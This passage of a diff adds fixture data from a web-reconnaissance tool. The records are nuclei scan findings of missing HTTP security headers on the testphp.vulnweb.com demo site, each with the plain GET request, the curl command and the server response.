"cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 699, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:41:46.223Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 700, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:46.384Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 701, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:46.545Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 702, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:41:46.698Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 703, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:41:46.855Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 704, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:47.024Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 705, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:41:47.187Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 706, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:41:47.336Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 707, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:41:47.483Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 708, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:47.636Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 709, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:47.806Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 710, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:41:47.970Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 711, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:48.131Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 712, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 